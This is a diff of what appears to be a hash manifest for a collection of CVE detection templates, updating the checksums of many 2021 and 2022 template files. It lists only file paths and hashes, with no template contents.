+http/cves/2021/CVE-2021-37833.yaml:9147c87c1d8c7cbdc6c90e73f4537a2cfb0ffa08 http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 -http/cves/2021/CVE-2021-38540.yaml:7878fc4ef40a5157a72fea08d7e7d28879cd83e7 +http/cves/2021/CVE-2021-38540.yaml:40e60e5c143755bf34c45b134f71cca4a0165122 http/cves/2021/CVE-2021-38647.yaml:d12fa581ce2c5917cb43d5af2d8edc56a31d3808 -http/cves/2021/CVE-2021-38702.yaml:937dc8484bbe5c93d0e84e8768a83db1add4c353 -http/cves/2021/CVE-2021-38704.yaml:3862195081ee44163006fc67f25d5cbd56396391 +http/cves/2021/CVE-2021-38702.yaml:7cb9a26484056f0955a7a91dd5ec2c6fa524df75 +http/cves/2021/CVE-2021-38704.yaml:bd8424cd3f0a688aac11da80e595d3545d3aee9f http/cves/2021/CVE-2021-38751.yaml:f73039cf9ee89c0ed2f5823ea7932261ebffa038 http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 http/cves/2021/CVE-2021-39146.yaml:9ef18404257cb1565c85ab67df499d1adaf5152c http/cves/2021/CVE-2021-39152.yaml:27f978b5960d9eb90e9113b832f0ecdf0f1d54ad -http/cves/2021/CVE-2021-39165.yaml:e6fc6f34e2e87016f6a199dfbcbc1083a9532dae -http/cves/2021/CVE-2021-39211.yaml:8c283388ab4cb374d75f66a73008acfa1ed34107 -http/cves/2021/CVE-2021-39226.yaml:e0e9268fe2647cd38c4e255c94f034996525c183 +http/cves/2021/CVE-2021-39165.yaml:41cb34053dcde697cdc2743a80c304656985e504 +http/cves/2021/CVE-2021-39211.yaml:ddf94e9cc0b050e3d6d330545946ad092c7ba314 +http/cves/2021/CVE-2021-39226.yaml:70ecb2383959f88ea9bfedaed49f76f5cf2a1475 http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e http/cves/2021/CVE-2021-39316.yaml:987c2e078d53725debd4637ce5c6d9f72914f683 -http/cves/2021/CVE-2021-39320.yaml:d55743bd0c30e3310dea7ffc7530dea784d1938f +http/cves/2021/CVE-2021-39320.yaml:002e6f6fcf6a88cd25bb3b423f9868e28ef80d59 http/cves/2021/CVE-2021-39322.yaml:6408a97278c6cf53fa277c226aa71b95f766fb41 http/cves/2021/CVE-2021-39327.yaml:4b9e392a8aed5ba3712bfa79673e89e403616964 http/cves/2021/CVE-2021-39350.yaml:bc1436fd7acd615ef4528971efa6a5066aa3b4d1 -http/cves/2021/CVE-2021-39433.yaml:beec72dfa9c2836d611a71dd565dcb142a72da31 -http/cves/2021/CVE-2021-39501.yaml:ec5ad1d64e6c1246ab273c38b912fcbddd7637af -http/cves/2021/CVE-2021-40149.yaml:1676310c0067f153ab7305bba1472380a767a0a8 -http/cves/2021/CVE-2021-40150.yaml:19dbd3ac074a19d46cf672e82952cce57dc7d871 -http/cves/2021/CVE-2021-40323.yaml:497d6b22e1eccc32f89e716d8290750b9e130abe -http/cves/2021/CVE-2021-40438.yaml:6e016c28d12e67a00a23bcf35b0cfb22888eb797 -http/cves/2021/CVE-2021-40539.yaml:eabff516d0834f61841b5f29e1bc4fbe2f6fca41 -http/cves/2021/CVE-2021-40542.yaml:d24460225cb566c0790fa0cf0293e9ccd121a84a -http/cves/2021/CVE-2021-40651.yaml:d0c2949c384e736bbc945a24017f05aa28d30d38 +http/cves/2021/CVE-2021-39433.yaml:9ebfc436d00bdfee4b944d1764beb52757dd085e +http/cves/2021/CVE-2021-39501.yaml:8e87f45189acbbe1c3d8f72b7c8d3de6d6e4cf1e +http/cves/2021/CVE-2021-40149.yaml:cf24971583916fc9df26152d3a6904e5d2256b62 +http/cves/2021/CVE-2021-40150.yaml:8d42c33df3f2a2212cb566144682e68211366684 +http/cves/2021/CVE-2021-40323.yaml:c887688f619ed428bfa00a8a3d1f560f50c4ee16 +http/cves/2021/CVE-2021-40438.yaml:c1b3337327ac449fa6493dfdb25cfced55cf4ac3 +http/cves/2021/CVE-2021-40539.yaml:51764f7c50c08d72e7f78823fe516f626c7eadb7 +http/cves/2021/CVE-2021-40542.yaml:3901563dc3bacc37311b557a68707c81831864d2 +http/cves/2021/CVE-2021-40651.yaml:caa1bf9adb2e2ad89e7a8c7920dd319e7752067c http/cves/2021/CVE-2021-40661.yaml:f780fd916ac3f8d1c70ea104c4cbf11905176041 -http/cves/2021/CVE-2021-40822.yaml:97de64ee2998793338d9184a47c51605cd2f6437 +http/cves/2021/CVE-2021-40822.yaml:deb901fe053f0c194f631c58770ce4386f819542 http/cves/2021/CVE-2021-40856.yaml:4aadf3d80dd73b612020a8d1ca20c5111201a957 http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 -http/cves/2021/CVE-2021-40868.yaml:a56bcaccdc7226a4b01f50507ef4a5b829cb5f02 -http/cves/2021/CVE-2021-40870.yaml:11ada269b8beb5ea7aa3d62a68dbeedfd7a574f1 -http/cves/2021/CVE-2021-40875.yaml:f1df098a240419566a0da1c521e7d16b038af00e -http/cves/2021/CVE-2021-40908.yaml:ce2725650a88ab95a4d556943be0b731c227b9a1 +http/cves/2021/CVE-2021-40868.yaml:c5c30fe3252bae32bf85e6b63c764d1c219d3cc7 +http/cves/2021/CVE-2021-40870.yaml:46d3de8e6493f2e904332956193f0421aff425a3 +http/cves/2021/CVE-2021-40875.yaml:fb4c6615ea5e8751f122107366e3d08eec8d236b +http/cves/2021/CVE-2021-40908.yaml:78115ff3db4e03b21cb56370d0c01957d7539d8f http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 -http/cves/2021/CVE-2021-40968.yaml:895232a56db6a7a97be40d4df4ca9a077580b7af -http/cves/2021/CVE-2021-40969.yaml:2c9bc3c0fc3481d3acd05f7dca5c2bdcab22680e -http/cves/2021/CVE-2021-40970.yaml:93c2c81ee58923603e9e76719ed3f265b354a6d9 -http/cves/2021/CVE-2021-40971.yaml:82479de07114ce2af5d9d054af5772e24fab4728 -http/cves/2021/CVE-2021-40972.yaml:5b1033503e68799ee48c7db99fe18022bbf90090 -http/cves/2021/CVE-2021-40973.yaml:cfebb17252bd68b2249cb86a685eee07c23f5c5b -http/cves/2021/CVE-2021-40978.yaml:69bfcf37ede0809cb9194d5537dac75694206fcc -http/cves/2021/CVE-2021-41174.yaml:f477462b5dd4cbb876d98c9b75e58aa99e70bbce -http/cves/2021/CVE-2021-41192.yaml:4cab8c9850131699d5522c858a61c02f55adfa07 +http/cves/2021/CVE-2021-40968.yaml:964f199af1bfb73b8aad3d1676fe863fdb72fa9f +http/cves/2021/CVE-2021-40969.yaml:5fa95bad2d845bd4e18097a5cbc2028480eb4f32 +http/cves/2021/CVE-2021-40970.yaml:7db56ae74c9d22d549d669e4621b3a5536ecdfc1 +http/cves/2021/CVE-2021-40971.yaml:d7c0f8712fe5a4d176bb466698ae0d0598458c3e +http/cves/2021/CVE-2021-40972.yaml:427e1fbcf2f2ab843437094217a83a741e972dd0 +http/cves/2021/CVE-2021-40973.yaml:d78c81f374b77cb9e1c791bddd878807aa4045a9 +http/cves/2021/CVE-2021-40978.yaml:a8c962c57edc1d0760271c053d5cae56c23ba5e9 +http/cves/2021/CVE-2021-41174.yaml:fa6d70e713a087560074a1967e8b7dce96fa38cd +http/cves/2021/CVE-2021-41192.yaml:079fec1025e916731f1ec243fa5873ba272fa007 http/cves/2021/CVE-2021-41266.yaml:8d081cc6e83f9e2b3397e60a81a16ec1a281b930 -http/cves/2021/CVE-2021-41277.yaml:1af9e26de8fd408f138f1ae8ea29f2f3772eb6bd -http/cves/2021/CVE-2021-41282.yaml:08dfe9f24d6edcba12decc8b0f52a30d4d111abc -http/cves/2021/CVE-2021-41291.yaml:8dfa8bb00874c95e87205cf611780c323317bbc1 -http/cves/2021/CVE-2021-41293.yaml:45713072befbaf77ed6f28d8582ce10f5d825984 -http/cves/2021/CVE-2021-41349.yaml:094ece33db1ffd227f413f689ec74783b821fb78 +http/cves/2021/CVE-2021-41277.yaml:5ef224cdb4e37d9ecb3237a8cca89056899ed757 +http/cves/2021/CVE-2021-41282.yaml:b050368c178e358c9aebc24e38129a370d3f64d5 +http/cves/2021/CVE-2021-41291.yaml:984169427a50e27703f9eb32406ce40e1a36a4d5 +http/cves/2021/CVE-2021-41293.yaml:126b34d1fa897ebca33a0331d478a68544c96235 +http/cves/2021/CVE-2021-41349.yaml:861b0593eb402420d60bd5676552a2343cadd097 http/cves/2021/CVE-2021-41381.yaml:0a52047e8dde8f010728956b9e9d71088ddb87e8 -http/cves/2021/CVE-2021-41432.yaml:09b5dddb286ad439bc6a693c958d166f983b0ae5 +http/cves/2021/CVE-2021-41432.yaml:8ccccfa69a596c41f1df5be177a85f0b73ce8098 http/cves/2021/CVE-2021-41460.yaml:ae7e6179c5d6ca32450f81c03fcaf39d34b8221d -http/cves/2021/CVE-2021-41467.yaml:5e6337c03bac6733a42d4bc9b8d0dc36f50178e8 +http/cves/2021/CVE-2021-41467.yaml:51e9bf3d8ad65e48d1dba90b473d125995f54de3 http/cves/2021/CVE-2021-41569.yaml:2c2ba97cff9b68cc6c448a1fb49c4e190460d10d http/cves/2021/CVE-2021-41648.yaml:60e9dcc0e99f1df5353d44d464fb0b7cd0593caf -http/cves/2021/CVE-2021-41649.yaml:4bc0c7180842cade90762bf71eb0b3d96c96f590 +http/cves/2021/CVE-2021-41649.yaml:acc19e8708a6a4f3a502515195f6be004882f0e9 http/cves/2021/CVE-2021-41653.yaml:3578aadef6ceea1b69fa0a6bf5a05a51afe45504 http/cves/2021/CVE-2021-41691.yaml:d5c6275154110bdc9d78c09dadce004287917630 -http/cves/2021/CVE-2021-41749.yaml:8ebb8ac082d62b69b2b0512fa21901b5bb5f9387 +http/cves/2021/CVE-2021-41749.yaml:90d4f9e6fe6c5fbef7f9ee2153fb841b4451c540 http/cves/2021/CVE-2021-41773.yaml:90279d433d0c1af880ab2755946704d9729786bc http/cves/2021/CVE-2021-41826.yaml:a8141bbbbc83b841143f8ac04fbbf369f77d54c6 http/cves/2021/CVE-2021-41878.yaml:8e2605b78d43422b23f6e5e263977290e45e1ea9 -http/cves/2021/CVE-2021-4191.yaml:7b6890c08e0ea17ae011f8c97340db77e0a90639 -http/cves/2021/CVE-2021-41951.yaml:0374f8f953e5e675bc35f3f9b4ed514822a56f2b -http/cves/2021/CVE-2021-42013.yaml:a5fe8608cfd03f9f39c5cb3c615383f46af38d3b -http/cves/2021/CVE-2021-42063.yaml:fb21c370ffa8b569b5f3c0a9c5877a0024953afb +http/cves/2021/CVE-2021-4191.yaml:f3213003b286620011e5b8952a3c7539327ab361 +http/cves/2021/CVE-2021-41951.yaml:4bc3fdf1d171b6203536f93edcb69ad6d6497afc +http/cves/2021/CVE-2021-42013.yaml:fa81be16aa732c0728938fe290380a3ade44bfea +http/cves/2021/CVE-2021-42063.yaml:e6959f1dd464f4b98421592102d37f9eb9e1c736 http/cves/2021/CVE-2021-42071.yaml:748f0615ef4142655d78ba5d86dd052c447ad312 http/cves/2021/CVE-2021-42192.yaml:b812ebb74367408339a3d62bab21f8e1d2ae996a -http/cves/2021/CVE-2021-42237.yaml:65d95d359203e835304459159321ad52af420af8 +http/cves/2021/CVE-2021-42237.yaml:cbac075bfbf5969fdf545d8ff4967c0214af1e51 http/cves/2021/CVE-2021-42258.yaml:ad213c4af31afd36d0ff95b7e52260947aa2013d http/cves/2021/CVE-2021-42551.yaml:423c75207a7156988c7470f235754d787fc81dd5 -http/cves/2021/CVE-2021-42565.yaml:b7050a52d1b9adc6589b30134c98ca7586b255fb -http/cves/2021/CVE-2021-42566.yaml:c8ae361a4557972af3ababd668677d47cbde2b99 -http/cves/2021/CVE-2021-42567.yaml:a80ad6215969060c0d6bc11412a6d1528c80ee57 -http/cves/2021/CVE-2021-42627.yaml:118a460e44bf332539c3bffe407752be1d66e97b +http/cves/2021/CVE-2021-42565.yaml:349855ab852f856d965c2509f381cd6a280db83c +http/cves/2021/CVE-2021-42566.yaml:6b4fea8d01a39aa24b8cb907502508b290479015 +http/cves/2021/CVE-2021-42567.yaml:25d6d3129b9f7ef453f4d31fcbbf4693c3e0a3bb +http/cves/2021/CVE-2021-42627.yaml:8bd1ef37323ca6a621b8125ea74629cf347850a2 http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 -http/cves/2021/CVE-2021-42887.yaml:b652a696751484e4fe62faa5f76b35173b2750d1 -http/cves/2021/CVE-2021-43062.yaml:3ad8c35e2a4d1d1eb6575e9bfa202614ff9bf45c -http/cves/2021/CVE-2021-43287.yaml:89df229aa87f93a0d9b8a0862fc87506c394d086 -http/cves/2021/CVE-2021-43421.yaml:9e9538c9f9a44082df040bc55a071f244bf1c0bc +http/cves/2021/CVE-2021-42887.yaml:513914035f14721f9a08c8ea5568398dcdf067ae +http/cves/2021/CVE-2021-43062.yaml:c71fbab832d06d5b33828ae676e47b8747c15bff +http/cves/2021/CVE-2021-43287.yaml:16248fc2271234a81fa08e34dc91e1eea2399bf6 +http/cves/2021/CVE-2021-43421.yaml:75cab9aa0d3a6b660677a75116558d3b7c555ff1 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 -http/cves/2021/CVE-2021-43496.yaml:e5290c4bf73b51d8d7a9b72b786da52c792efacc -http/cves/2021/CVE-2021-43510.yaml:5bbb323d593178e5a7fad0f15f9ce444cc54660a -http/cves/2021/CVE-2021-43574.yaml:58127d69ee6b55562a1adb0d6c8727a953f75d84 -http/cves/2021/CVE-2021-43725.yaml:41ce9d637952eb2ca404f208919ceb9cfe13dc6d -http/cves/2021/CVE-2021-43734.yaml:dba526b082cfc049008079854f5c358cdc54dc74 -http/cves/2021/CVE-2021-43778.yaml:ad88d645783c6b9746154a4117a8ca7959b9ca96 -http/cves/2021/CVE-2021-43798.yaml:de04e3df23ebd2c069be1b336f0012aac224cd20 -http/cves/2021/CVE-2021-43810.yaml:526535289d787090ef90d066f958104848576da4 -http/cves/2021/CVE-2021-44077.yaml:1644a3a64ebce7407238683eb03183ff9c26bd36 -http/cves/2021/CVE-2021-44138.yaml:3c5c76e5460123baafa27dd63bb85b79548a6df3 -http/cves/2021/CVE-2021-44139.yaml:fa88a23765b635e301c27d0c9156c82885acd14c -http/cves/2021/CVE-2021-44152.yaml:8b5d9cf98c57998620f4fa6442de1afa32329253 -http/cves/2021/CVE-2021-44228.yaml:f545ebcc0e97655ca69d29d9f4621a84bf8f1c11 -http/cves/2021/CVE-2021-44427.yaml:6b68d18623ee449f8123ae7d1814abea2ebba95c -http/cves/2021/CVE-2021-44451.yaml:d426662cca643eebe07c7c3ffa4ee527ae38c573 -http/cves/2021/CVE-2021-44515.yaml:2377df3a403f2b0e4348f80c3d8a0657dcfe6767 -http/cves/2021/CVE-2021-44528.yaml:dd96edc7d677dbffbb885fa6e72343c6d483e914 -http/cves/2021/CVE-2021-44529.yaml:cf9873ecc8d0687caf0d1ec7437ad2a149444a92 -http/cves/2021/CVE-2021-44848.yaml:72866e10d920ae7ab6caef5d0b943cb17ab72665 +http/cves/2021/CVE-2021-43496.yaml:550ea33b0e0144d91382b8351c5ff8331b6e3bdf +http/cves/2021/CVE-2021-43510.yaml:e90f6fcbc02221af5c21502f37214e7dbb03da06 +http/cves/2021/CVE-2021-43574.yaml:fa3aed7dc20e9eb8a8e6b4c67c713fdc06db754e +http/cves/2021/CVE-2021-43725.yaml:59285460dc20d495fc8de3f504303e4092f9abeb +http/cves/2021/CVE-2021-43734.yaml:dea1b7bf4546e4c474fd3a61042b80a6ab67755e +http/cves/2021/CVE-2021-43778.yaml:2f3bb0a0f9ad88cc38b6dfa0abda010822203ea9 +http/cves/2021/CVE-2021-43798.yaml:7f0c4ac0ca895a44b62aac3b17d5af98831a7b35 +http/cves/2021/CVE-2021-43810.yaml:e091cab75505c3576561a0e55d7f45be46ed0e9f +http/cves/2021/CVE-2021-44077.yaml:cb77a5c0a315f9be21761f87ed2d2c7d51fd1d5d +http/cves/2021/CVE-2021-44138.yaml:bcd6d09acb5531955814c792a08a48d3f300b6df +http/cves/2021/CVE-2021-44139.yaml:e2abf3fb9150c49b3e62712c0f5ccaaae8267c02 +http/cves/2021/CVE-2021-44152.yaml:97d21f7c6479a629ce57d98f7aed969c6a41337b +http/cves/2021/CVE-2021-44228.yaml:8874a4c3724b6c1c3ea43e62fbb9ecdca5d3772f +http/cves/2021/CVE-2021-44427.yaml:2c4dacfc13a61ca0565e786199ea8ddff21bf839 +http/cves/2021/CVE-2021-44451.yaml:84311023e257489100f240c95bbe75a967e0dd3d +http/cves/2021/CVE-2021-44515.yaml:da4641ba423dd57a8ee2a74df23f13ff1c78d764 +http/cves/2021/CVE-2021-44528.yaml:a90fe083b4bfef66425ecb9f129dccb029da470f +http/cves/2021/CVE-2021-44529.yaml:9bc01beb998db429f7f503dcb18c4e48852c108f +http/cves/2021/CVE-2021-44848.yaml:bd86dec475898fda93191256ca601bc9f17d2dd6 http/cves/2021/CVE-2021-44910.yaml:9fb4989116e0167c603c3ea4a0bcac68841d7b04 -http/cves/2021/CVE-2021-45043.yaml:4db365b28f347995f9a00d0cf3a86607d90450b7 -http/cves/2021/CVE-2021-45046.yaml:0b49378253d16c99f2ee11fbae7118a9bc97b1a0 -http/cves/2021/CVE-2021-45092.yaml:1dba004d7ee00fa91c11183e02de07b361e0bf4f -http/cves/2021/CVE-2021-45232.yaml:d2c1bafb15044e35687dd8b61324bbcaa9663c97 -http/cves/2021/CVE-2021-45380.yaml:28a8998161318fb791ec581cb4c6a3c5245833d4 +http/cves/2021/CVE-2021-45043.yaml:1e51c0d78e6fc4258b3507a9c28853b3c9a60aa8 +http/cves/2021/CVE-2021-45046.yaml:afbe6d9a4df0b57c8853d9fce778442240163d57 +http/cves/2021/CVE-2021-45092.yaml:961fde42602a37607b86120d8a299db382e42444 +http/cves/2021/CVE-2021-45232.yaml:c09fc24183a14f9ad3bc2e917a0c58cd2bedb705 +http/cves/2021/CVE-2021-45380.yaml:5d7282f11e5e5a66f1a5969b7d82928d74009d37 http/cves/2021/CVE-2021-45382.yaml:cb0aa02a98b1cdfda90a720aed418fb486944046 -http/cves/2021/CVE-2021-45422.yaml:5f575fea8f02589ffefda0f7bbb15ed05cb6e06a -http/cves/2021/CVE-2021-45428.yaml:7a5a27ecbf32f0b4d97e631a5b7dff3c5273918e +http/cves/2021/CVE-2021-45422.yaml:abe8cd4316f90eb4455c2de2069f1237fdb60b2d +http/cves/2021/CVE-2021-45428.yaml:14d98248ac661705a256a679f0eb6e1e48233c2b http/cves/2021/CVE-2021-45967.yaml:1c060977d1fab68ce71716addc499b6eaea77589 -http/cves/2021/CVE-2021-45968.yaml:d6e44da357371f41e4af563fb03bccd9de105665 -http/cves/2021/CVE-2021-46005.yaml:37a4af6e976d9154a3acd2b3114fc430ffe28688 +http/cves/2021/CVE-2021-45968.yaml:921c33e7aeeb0b0ce6f57a9e457d202de0285cd8 +http/cves/2021/CVE-2021-46005.yaml:3b3b7ae4a988dd406432da64978b8a385a76f20d http/cves/2021/CVE-2021-46068.yaml:1b53ecee2963550e1b687c2c93a33974ce779452 -http/cves/2021/CVE-2021-46069.yaml:263123f9863d0fff4b12647b2af0d70f61e1da93 -http/cves/2021/CVE-2021-46071.yaml:be69e1de19a625ea890c5adc664197ed219e5c5c -http/cves/2021/CVE-2021-46072.yaml:c94fbbed0b6f71806b45297c2ad54aaeac656efe +http/cves/2021/CVE-2021-46069.yaml:7783bc454b975263aac0f62dbfdb460f0c3c42c0 +http/cves/2021/CVE-2021-46071.yaml:a76d33573617d153689d9213a457a03115c736e4 +http/cves/2021/CVE-2021-46072.yaml:ea0e7e2699eff6c50de4bd5ca80d862ba3ceb89e http/cves/2021/CVE-2021-46073.yaml:370eac8c9753d59b40b3ace444f6ac9875a63e30 -http/cves/2021/CVE-2021-46107.yaml:b9bad6acbf7575d9c393b2564265e1a5691f1c46 +http/cves/2021/CVE-2021-46107.yaml:641c648031b4996c9675c33b60f84a027ef396ad http/cves/2021/CVE-2021-46379.yaml:8d6452a442fe0d4a02cdb518cb4b8c8b1a74ef0f -http/cves/2021/CVE-2021-46381.yaml:75b38da693dfd3d74f643fe7a39ee9dfcdfbab34 -http/cves/2021/CVE-2021-46387.yaml:820741fa5c155a62a65ae03741bade8e1b8316cb -http/cves/2021/CVE-2021-46417.yaml:184828b0c60562bd2dfa267fb1cb42935258ef31 -http/cves/2021/CVE-2021-46418.yaml:0f395c12b1e0e2faa82edd9aea14d17d6771f97a -http/cves/2021/CVE-2021-46419.yaml:e2a58404236416ee7faf026547c70a201b604f58 -http/cves/2021/CVE-2021-46422.yaml:41d3ddae9c0fd140ccaccf65b05c44de8071d9ff -http/cves/2021/CVE-2021-46424.yaml:0a01448b7eebb11fa41787e31ff4df5ae1b80cfc -http/cves/2021/CVE-2021-46704.yaml:75ccf63cb86b0455de6ed2f3a18f9461036f737d -http/cves/2022/CVE-2022-0087.yaml:96d30fc9b4ecbcc340068ec0a2e0893ff40f1752 +http/cves/2021/CVE-2021-46381.yaml:bbcbebb42a2e8f7f01be371dc8232f53ffead9c8 +http/cves/2021/CVE-2021-46387.yaml:fbaa07306156853f0ad9c456e5fcdbf513325525 +http/cves/2021/CVE-2021-46417.yaml:81fc12ccebc22b72ca3d728fa7d161e9505ec4b6 +http/cves/2021/CVE-2021-46418.yaml:e509a70568c23a42f981b047a31ea92feb06ab25 +http/cves/2021/CVE-2021-46419.yaml:ae2aac1ea6d97d7931ce84530d527552810b1da4 +http/cves/2021/CVE-2021-46422.yaml:0579fb33431d31ec41b9974a2d5b1dd65e6c2168 +http/cves/2021/CVE-2021-46424.yaml:9617db0426268d98d18332d222675f954fd2dc91 +http/cves/2021/CVE-2021-46704.yaml:1151ef46dae07f75345210c43a707142147a474e +http/cves/2022/CVE-2022-0087.yaml:ab30fa1e96d3eefebcff47dc05be32b1ef1d6467 http/cves/2022/CVE-2022-0140.yaml:1df6fe2127b2d8ff6f801b6c7a87ce18c0dd12a7 -http/cves/2022/CVE-2022-0147.yaml:58d1f7087d04a19479c6059d2a351e89067e57cf -http/cves/2022/CVE-2022-0148.yaml:c519410ada58a1024c581fbb8390ee16fce23b5c -http/cves/2022/CVE-2022-0149.yaml:cdaa1e7fa3d3965d3a5a7e68d7ed2ee002783309 -http/cves/2022/CVE-2022-0150.yaml:92f4eda8d824338d40eff023455effea0deed7c6 +http/cves/2022/CVE-2022-0147.yaml:d50f59648ef62408d211f30339418e1f73546638 +http/cves/2022/CVE-2022-0148.yaml:6a2d16cdaa86368c72f3cebd570cf17b9b62884b +http/cves/2022/CVE-2022-0149.yaml:af0215192be07e3b138588253c487d2d703af86f +http/cves/2022/CVE-2022-0150.yaml:f765c4284c3293fe8b624302e607fb8ff2bd6c29 http/cves/2022/CVE-2022-0165.yaml:e21ba3dfe35f2b3998366d54a92f873f4a043135 -http/cves/2022/CVE-2022-0169.yaml:ae25c860e5de463251aae8fe4403d4819809ab4f -http/cves/2022/CVE-2022-0189.yaml:378e59aea7a1b26e04c778902959a4bd92d7bfa3 +http/cves/2022/CVE-2022-0169.yaml:73319c090a403deb80d746331231a0f83221abed +http/cves/2022/CVE-2022-0189.yaml:6f59568727b063610e2c24e6433ea81631ce8656 http/cves/2022/CVE-2022-0201.yaml:04312080723927883df87137d0d5eb769d3c4045 -http/cves/2022/CVE-2022-0206.yaml:5f45d476b92fcb037c75b1f3a91136ac8e8007c2 +http/cves/2022/CVE-2022-0206.yaml:e41f2247cca58a20bf9db2562b63d82a1a88fe76 http/cves/2022/CVE-2022-0208.yaml:f94f8e7a05eda6a691d54be067aec88feac62a92 -http/cves/2022/CVE-2022-0212.yaml:569f37fa82968453259475bb02344ce05c1f1238 +http/cves/2022/CVE-2022-0212.yaml:cd4f5f85b3a6879d1848a351c1eb1a23468aaa72 http/cves/2022/CVE-2022-0218.yaml:cfb01741cc062e2e759d4c0d6990be3702aa7ea1 http/cves/2022/CVE-2022-0220.yaml:b3d359e13bca582b964565a09419347cfde13608 -http/cves/2022/CVE-2022-0228.yaml:6b2faa22a3cc9535bbc2118316d8c0a5c85d691d -http/cves/2022/CVE-2022-0234.yaml:1bf0c595f2a6fde1563f84feb27890832a698099 -http/cves/2022/CVE-2022-0271.yaml:982ff0fc90e3568327d23b1b61e5474792599782 -http/cves/2022/CVE-2022-0281.yaml:f7e979cfdee4932734b6f202712c5bf02067a72a -http/cves/2022/CVE-2022-0288.yaml:f1cf4803487648721e9ed10c23c2de84dd60e245 -http/cves/2022/CVE-2022-0342.yaml:a0b57e0b25d6bd42a09f0e97e76fd6067b2e9f2d +http/cves/2022/CVE-2022-0228.yaml:cf59f3e5671faadd5f722f3992062483fa52789c +http/cves/2022/CVE-2022-0234.yaml:28adef5f0da5150793b2b58515a733b094122c01 +http/cves/2022/CVE-2022-0271.yaml:12559da2dbf1bd54ee65b330bc05320a598317c7 +http/cves/2022/CVE-2022-0281.yaml:d39333e81404820d979f757cff2ff5e92e014ead +http/cves/2022/CVE-2022-0288.yaml:bded7808021892901eeb0ca82eaa4d323e5d8e9d +http/cves/2022/CVE-2022-0342.yaml:7ad6be74eecbdae6633555867578a66ea7676bd7 http/cves/2022/CVE-2022-0346.yaml:222700feb32d0e6514e9bb0380c883ce6f8ad6d6 -http/cves/2022/CVE-2022-0349.yaml:fdde6d3801452f54280f76f5b7218e6af3874c20 -http/cves/2022/CVE-2022-0378.yaml:f9b45d78cc2fa38664b2888e1a6668e0f8db071e +http/cves/2022/CVE-2022-0349.yaml:800ce9d18fc4a8c58d309ca4e50610a2c1143114 +http/cves/2022/CVE-2022-0378.yaml:b0a63a5b4d4bbea5e86edccbdbca5d5380dcc493 http/cves/2022/CVE-2022-0381.yaml:bab0c1f47359cc9c8960f33d7266351eb1565086 http/cves/2022/CVE-2022-0412.yaml:c50a4e2c407b2a259e239ad64d58ae537570b780 -http/cves/2022/CVE-2022-0415.yaml:43badfdc1cb603cabd639e037e7ca72baa540347 -http/cves/2022/CVE-2022-0422.yaml:8955d66723dc59c09675534435b4c93aa2cef1fa -http/cves/2022/CVE-2022-0424.yaml:f09a2112a5421d11aac45e34938d600b74c71333 -http/cves/2022/CVE-2022-0432.yaml:b492288e1d57520617110aa8577bcf2bf832c785 -http/cves/2022/CVE-2022-0434.yaml:e695ba2491bce90444a1058b27bef6690c4865b3 +http/cves/2022/CVE-2022-0415.yaml:58fb646d9818d5cd5d799b6259cd25ebad7e201c +http/cves/2022/CVE-2022-0422.yaml:6269517eaa64f536ddf2367ac408b436a6fed3a4 +http/cves/2022/CVE-2022-0424.yaml:a15f808f9bf89cda5d300f87d1968bb94076b0f4 +http/cves/2022/CVE-2022-0432.yaml:1b318f354339465c6a6dd7e42c5d12a45c3e160c +http/cves/2022/CVE-2022-0434.yaml:998f7112926cb758d14a8357ac45c0eb08744640 http/cves/2022/CVE-2022-0437.yaml:6a57d2ad863ac623a9a0ce5108e7620bd56e11fa http/cves/2022/CVE-2022-0441.yaml:c0d4b5a324d0e9415535f698f4ee3278d8225377 http/cves/2022/CVE-2022-0482.yaml:06f529926dbce7d867c0aa57cea96bc261ae7feb -http/cves/2022/CVE-2022-0533.yaml:8efd15c2a82f958f59acde765060ab45e5170dee +http/cves/2022/CVE-2022-0533.yaml:8ccd3d1054d1ae94cf7b67935f0eafc3535d18f3 http/cves/2022/CVE-2022-0535.yaml:12c5101dc64287aa7ed4e6e95b4c82b2e507ace5 http/cves/2022/CVE-2022-0540.yaml:a3a2456f497dd9162f512c1cefdc2ae77cb2bfb5 http/cves/2022/CVE-2022-0591.yaml:fd13351808c85fd8f0b666270fe6d7afaadab094 http/cves/2022/CVE-2022-0594.yaml:0557f5bdd81dd3c1ed4d6e070eb23303b24f16d9 http/cves/2022/CVE-2022-0595.yaml:c93f58fb37203da06c1bb160f7fe787f08440db7 -http/cves/2022/CVE-2022-0597.yaml:d1d3926087f435937d89a594bed0ecd848c8f87c -http/cves/2022/CVE-2022-0599.yaml:5047f9351c72fd3ee1ea33792568fcafffeaa5b6 -http/cves/2022/CVE-2022-0651.yaml:66883e63762a7cfc40b7b1bbe8513e396c0b0808 -http/cves/2022/CVE-2022-0653.yaml:47ee405bc84ddace974e1fda1f02051c1dddf3c2 -http/cves/2022/CVE-2022-0656.yaml:aa79d191591143c2dac13f1550f5823bc4f8cbec -http/cves/2022/CVE-2022-0658.yaml:e9d2506aa81aedd4fcfdb9d9cb911de0aa78d291 -http/cves/2022/CVE-2022-0660.yaml:76399d19000084ed00adedb6c8470124bb24b13f -http/cves/2022/CVE-2022-0678.yaml:b700d1edcc4b2055ff74f19cc3c59fba1e37df8b +http/cves/2022/CVE-2022-0597.yaml:385328795fc8323bc1e1f605236d5e0b18dc3d8f +http/cves/2022/CVE-2022-0599.yaml:396f247c7262420516ea089cfc09a748dbc1803b +http/cves/2022/CVE-2022-0651.yaml:b495b93f495fe5bd1e706ce24e66beab7233e2eb +http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 +http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf +http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 +http/cves/2022/CVE-2022-0660.yaml:847e3682f3a3903749f0d44adf0697a838a405e4 